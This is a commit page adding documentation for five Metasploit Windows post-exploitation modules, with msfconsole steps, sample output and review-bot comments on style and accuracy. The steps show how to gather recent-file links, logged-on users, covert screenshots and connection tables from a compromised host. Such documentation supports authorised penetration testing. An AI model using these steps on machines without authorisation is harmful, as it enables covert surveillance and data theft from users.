Land rapid7#12707, more module docs
h00die committed Dec 21, 2019
2 parents e037495 + 6b746e3 commit 155a2eb
Showing 5 changed files with 299 additions and 0 deletions.
79 changes: 79 additions & 0 deletions documentation/modules/post/windows/gather/dumplinks.md
@@ -0,0 +1,79 @@

## Vulnerable Application

The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's
Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically
for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/dumplinks```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.


## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49160) at 2019-12-11 15:45:16 -0700
msf > use post/windows/gather/dumplinks
msf post(windows/gather/dumplinks) > set SESSION 1
SESSION => 1
msf post(windows/gather/dumplinks) > run
[*] Running module against TEST-PC
[*] Extracting lnk files for user TEST at C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\...
[*] Processing: C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk.
[*] Processing: C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\Network and Internet.lnk.
[*] No Recent Office files found for user TEST. Nothing to do.
[*] Post module execution completed
```

## Example of looted .lnk output

```
[*] exec: cat /root/.msf4/loot/20191211154832_default_192.168.1.10_host.windows.lnk_124491.txt
C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk:
Access Time = 2019-12-11 23:44:39 -0700
Creation Date = 2019-12-11 23:44:39 -0700
Modification Time = 2019-12-11 23:44:39 -0700
Contents of C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk:
Flags:
Shell Item ID List exists.
Shortcut points to a file or directory.
The shortcut has a relative path string.
The shortcut has working directory.
Attributes:
Target was modified since last backup.
Target file's MAC Times stored in lnk file:
Creation Time = 2019-12-11 23:44:30 -0700. (UTC)
Modification Time = 2019-12-11 23:44:30 -0700. (UTC)
Access Time = 2019-12-11 23:44:30 -0700. (UTC)
ShowWnd value(s):
SW_NORMAL.
SW_SHOWMAXIMIZED.
SW_SHOW.
SW_SHOWMINNOACTIVE.
SW_RESTORE.
Target file's MAC Times stored in lnk file:
Creation Time = 2019-12-11 23:44:30 -0700. (UTC)
Modification Time = 2019-12-11 23:44:30 -0700. (UTC)
Access Time = 2019-12-11 23:44:30 -0700. (UTC)
Shortcut file is on a local volume.
Volume Name =
Volume Type = Fixed
Volume SN = 0x548EF20B
Target path = C:\Users\TEST\Desktop\myPasswords.txt&..\..\..\..\..\Desktop\myPasswords.txtC:\Users\TEST\Desktop(
```
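Review bot: the final `Target path = ...` line of the looted sample runs the absolute target path, the relative path and the working directory together with stray `&` and `(` separators, and the `Target file's MAC Times stored in lnk file:` block appears twice; since this page presents the module's real output as the expected result, either trim the sample or raise the parsing problem against the module itself so the docs do not freeze garbled output as correct. Two style points that apply to this file and the other four in the commit: the verification steps wrap inline commands in triple backticks (```` ```use post/windows/gather/dumplinks``` ````) where single backticks are the markdown convention for inline code, and the file opens with a blank line before `## Vulnerable Application` and has a double blank line before `## Scenarios`.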
60 changes: 60 additions & 0 deletions documentation/modules/post/windows/gather/enum_devices.md
@@ -0,0 +1,60 @@

## Vulnerable Application

Enumerate PCI hardware information from the registry. Please note this script will run through registry subkeys such as: 'PCI', 'ACPI',
'ACPI_HAL', 'FDC', 'HID', 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW', and 'USB'; it will take time to
finish. It is recommended to run this module as a background job.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/enum_devices```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.


## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49160) at 2019-12-11 15:45:16 -0700
msf > use post/windows/gather/enum_devices
msf post(windows/gather/enum_devices) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_devices) > run
[*] Enumerating hardware on TEST-PC
[+] Results saved in: /root/.msf4/loot/20191211161351_default_192.168.1.10_host.hardware_245183.txt
[*] Post module execution completed
```

## Example of looted output

```
[*] exec: cat /root/.msf4/loot/20191211161351_default_192.168.1.10_host.hardware_245183.txt
Device Information
==================
Device Description Driver Version Class Manufacturer Extra
------------------ -------------- ----- ------------ -----
ACPI Fixed Feature Button 6.1.7601.17514 System (Standard system devices)
ACPI x86-based PC 6.1.7600.16385 Computer (Standard computers)
AMD K8 Processor 6.1.7600.16385 Processor Advanced Micro Devices Common KVM processor
Beep LegacyDriver
CD-ROM Drive 6.1.7601.17514 CDROM (Standard CD-ROM drives) QEMU QEMU DVD-ROM ATA Device
CD/DVD File System Reader LegacyDriver
CNG LegacyDriver
Composite Bus Enumerator 6.1.7601.17514 System Microsoft
Disk drive 6.1.7600.16385 DiskDrive (Standard disk drives) Red Hat VirtIO SCSI Disk Device
...snip...
```
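Review bot: the registry key list in the description has a misplaced quote, `'LEGACY'', LPTENUM'` should read `'LEGACY', 'LPTENUM'`. The opening sentence also says the module enumerates "PCI hardware information" while the list that follows covers ACPI, HID, IDE, SCSI, USB and more, and the loot sample is a general `Device Information` table; "hardware device information from the registry" would describe it accurately. The advice to run as a background job would be more actionable if the verification steps showed the syntax (`run -j`) instead of leaving the reader to find it. Same leading blank line and double blank before `## Scenarios` as in dumplinks.md.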
64 changes: 64 additions & 0 deletions documentation/modules/post/windows/gather/enum_logged_on_users.md
@@ -0,0 +1,64 @@

## Vulnerable Application

This module will enumerate current and recently logged on Windows users.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/enum_logged_on_users```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**CURRENT**

Enumerate currently logged on users. Default: ```true```

**RECENT**

Enumerate Recently logged on users. Default: ```true```

**SESSION**

The session to run this module on.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700
msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
msf post(windows/gather/enum_logged_on_users) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_logged_on_users) > run
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-3113421791-4205713440-112141152-1000 TEST-PC\TEST
[+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-3113421791-4205713440-112141152-1000 C:\Users\TEST
[*] Post module execution completed
```
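Review bot: `The session to run this module on.` differs from the SESSION wording used in the other four files (`The session to run the module on.`), and `Enumerate Recently logged on users` has a stray capital R; both should be aligned. The CURRENT and RECENT option descriptions would also benefit from saying what each table is keyed on, since the sample shows CURRENT listing SID plus `DOMAIN\user` while RECENT lists SID plus profile path, so the well-known service SIDs S-1-5-18, S-1-5-19 and S-1-5-20 will always appear in the RECENT output alongside real user profiles.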
46 changes: 46 additions & 0 deletions documentation/modules/post/windows/gather/screen_spy.md
@@ -0,0 +1,46 @@
## Vulnerable Application

This module will incrementally take desktop screenshots from the
host. This allows for screen spying which can be useful to determine
if there is an active user on a machine, or to record the screen for
later data extraction.

Note: As of March, 2014, the `VIEW_CMD` option
has been removed in favor of the Boolean `VIEW_SCREENSHOTS` option,
which will control if (but not how) the collected screenshots will
be viewed from the Metasploit interface.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/screen_spy```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
msf > use post/windows/gather/screen_spy
msf post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf post(windows/gather/screen_spy) > run
[*] Migrating to explorer.exe pid: 1908
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
```
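Review bot: the Options section lists only SESSION, but the description refers to `VIEW_SCREENSHOTS` and the sample run reports `Capturing 6 screenshots with a delay of 5 seconds`, so the options controlling the count and delay, and `VIEW_SCREENSHOTS` itself, need entries with their defaults. The session-open line has a typo in the timestamp (`201 9-12-12`) and is identical, down to port 49184, to the one in tcpnetstat.md, so it reads as pasted rather than captured; re-capture from a real run. The "As of March, 2014" paragraph about `VIEW_CMD` being removed is changelog material rather than user documentation and would sit better as a one-line note under the option it replaced.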
50 changes: 50 additions & 0 deletions documentation/modules/post/windows/gather/tcpnetstat.md
@@ -0,0 +1,50 @@
## Vulnerable Application

This Module lists current TCP sessions.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/tcpnetstat```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
msf > use post/windows/gather/tcpnetstat
msf post(windows/gather/tcpnetstat) > set SESSION 1
SESSION => 1
msf post(windows/gather/tcpnetstat) > run
[*] TCP Table Size: 412
[*] Total TCP Entries: 10
[*] Connection Table
================
STATE LHOST LPORT RHOST RPORT
----- ----- ----- ----- -----
ESTABLISHED 192.168.1.10 49184 192.168.1.3 4444
LISTEN 0.0.0.0 135 0.0.0.0 _
LISTEN 0.0.0.0 445 0.0.0.0 _
LISTEN 0.0.0.0 5357 0.0.0.0 _
LISTEN 0.0.0.0 49152 0.0.0.0 _
LISTEN 0.0.0.0 49153 0.0.0.0 _
LISTEN 0.0.0.0 49154 0.0.0.0 _
LISTEN 0.0.0.0 49155 0.0.0.0 _
LISTEN 0.0.0.0 49156 0.0.0.0 _
LISTEN 192.168.1.10 139 0.0.0.0 _
[*] Post module execution completed
```
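Review bot: `This Module lists current TCP sessions.` capitalises Module mid-sentence, and the description undersells the output: the sample is the full TCP table including LISTEN sockets, which is worth stating so readers understand the `_` placeholder in the RPORT column for listening entries. The session-open line shares the `201 9-12-12` timestamp typo and port 49184 with screen_spy.md, so it should be replaced with the line from the actual run whose output follows it.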
